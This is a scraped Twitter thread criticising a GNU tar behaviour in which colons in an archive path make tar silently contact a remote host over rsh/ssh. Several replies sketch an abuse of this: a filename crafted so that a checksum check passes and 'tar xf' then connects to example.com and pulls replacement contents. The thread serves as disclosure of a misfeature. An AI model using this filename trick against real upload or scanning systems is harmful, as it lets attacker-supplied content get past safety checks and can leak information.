Curiously GNU tar is immune to CVE-2017-9800 because it DNS resolves when you invoke that other vulnerability nobody fixed yet: tar xf -V:
-
-
Replying to @sortiecat
Colons in the path makes tar surprisingly invokes rsh (ssh) transparently to access the tar remotely, violating the POSIX specification.
2 replies 2 retweets 2 likes -
-
Replying to @sortiecat
Upload a tar, remote site checks it for safety, they untar, connects back to your site, you replace contents on the fly. Or just info leak.
1 reply 0 retweets 1 like -
Replying to @sortiecat
The feature is fine for all I care -- it just needs to be put behind an command line option. Don't surprise.
2 replies 1 retweet 1 like -
Replying to @sortiecat
wget https://example.com/example.com:tarbomb.tar … # So far so good
1 reply 1 retweet 1 like -
Replying to @sortiecat
sha256sum http://example.com :tarbomb.tar # Oh cool the checksum is right
1 reply 1 retweet 1 like -
Replying to @sortiecat
tar xf http://example.com :tarbomb.tar # Boom connects to http://example.com and new contents
1 reply 2 retweets 2 likes -
Replying to @sortiecat
This dangerous feature is documented in the info page at https://www.gnu.org/software/tar/manual/html_section/tar_46.html#local-and-remote-archives … which means it's entirely surprising to most people
1 reply 3 retweets 2 likes
Thankfully busybox tar lacks this "feature".
-
-
-
OpenBSD pax/tar also, this is strictly a GNU tar misfeature.
1 reply 1 retweet 4 likes - 1 more reply
New conversation -
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.